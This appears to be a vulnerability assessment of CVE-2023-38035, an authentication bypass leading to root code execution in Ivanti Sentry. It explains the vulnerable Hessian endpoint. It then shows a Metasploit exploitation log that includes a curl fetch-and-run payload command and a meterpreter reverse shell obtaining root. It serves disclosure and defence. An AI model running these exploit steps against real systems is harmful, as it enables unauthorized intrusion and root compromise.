A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.

Recent assessments:

jheysel-r7 at August 29, 2023 10:04pm UTC reported:

Description

Ivanti Sentry (formerly MobileIron Sentry) is vulnerable to an authentication by-pass which exposes API functionality which allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService exposes a binary web service protocol, Hessian, which allows remote users to invoke functions within the target Sentry system.

One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput which accepts a command argument that gets directly fed into a Runtime.getRuntime().exec(cmd) call. The command is run in the context of the tomcat2 user however by default tomcat2 is able to execute commands with sudo thus we can use this to execute the payload in the context of the root user.

Attacker Value and Exploitability

For attacker’s this one is pretty juicy as it gives unauthenticated RCE in the context of the root users, it doesn’t get much better than that. Seeing CVE-2023-38035 being added to the KEV list only one day after it was published speaks volumes on the usefulness to malicious adversaries. To the attacker’s benefit there aren’t any definitive IoCs other than unrecognized HTTP requests to /services/* which should be cause for concern. The only saving grace is that a Shodan search for Ivanti Sentry targets on the internet only yielded around 500 vulnerable instances exposed at the time the vuln was disclosed.

Vulnerable Versions

Ivanti Sentry versions vulnerable to CVE-2023-38035:

• =< 9.18.0

Vulnerable Environment

A vulnerable MobileIron Sentry version 9.12.0-16 .vhd file can be downloaded from the following URL

Metasploit Module Demonstration

msf6 > use linux/http/ivanti_sentry_misc_log_service
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
fetch_srvhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit
[*] Reloading module...

[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
[*] Fetch Handler listening on 192.168.1.72:8080
[*] HTTP server started
[*] Adding resource /etRbFA76UzDRclkL8zrTdg
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo  chmod +x /tmp/ccrjHXsc
[*] Running the command: sudo  /tmp/ccrjHXsc &
[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5